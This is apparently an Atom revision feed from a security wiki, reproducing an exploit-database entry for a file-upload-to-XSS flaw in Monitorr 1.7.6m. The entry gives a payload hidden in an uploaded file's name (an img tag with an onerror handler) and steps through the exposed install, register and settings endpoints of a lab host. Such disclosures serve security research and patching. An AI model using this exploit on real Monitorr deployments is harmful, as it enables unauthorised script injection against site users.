https://pwnwiki.com/index.php?action=history&feed=atom&title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E 2026-04-10T06:17:54Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E&diff=1907&oldid=prev 2021-04-27T11:45:54Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Montiorr 1.7.6m - File Upload to XSS # Date: 25/4/2021 # Exploit Author: Ahmad Shakla # Software Link: https://github.com/Monitorr/Monitorr # Te...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Montiorr 1.7.6m - File Upload to XSS<br /> # Date: 25/4/2021<br /> # Exploit Author: Ahmad Shakla<br /> # Software Link: https://github.com/Monitorr/Monitorr<br /> # Tested on: Kali GNU/Linux 2020.2<br /> # Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html<br /> <br /> An attacker can preform an XSS attack via image upload<br /> <br /> Steps :<br /> <br /> 1)Create a payload with the following format :<br /> &gt;&lt;img src=x onerror=alert(&quot;XSS&quot;)&gt;.png<br /> <br /> 2) Install the database by going to the following link :<br /> https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php<br /> <br /> 3)Register for a new account on the server by going to the following link :<br /> https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register<br /> <br /> 4)Login with your credentials on the following link :<br /> https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php<br /> <br /> 5)Go to the following link and upload the payload :<br /> https://monitorr.robyns-petshop.thm/settings.php#services-configuration<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki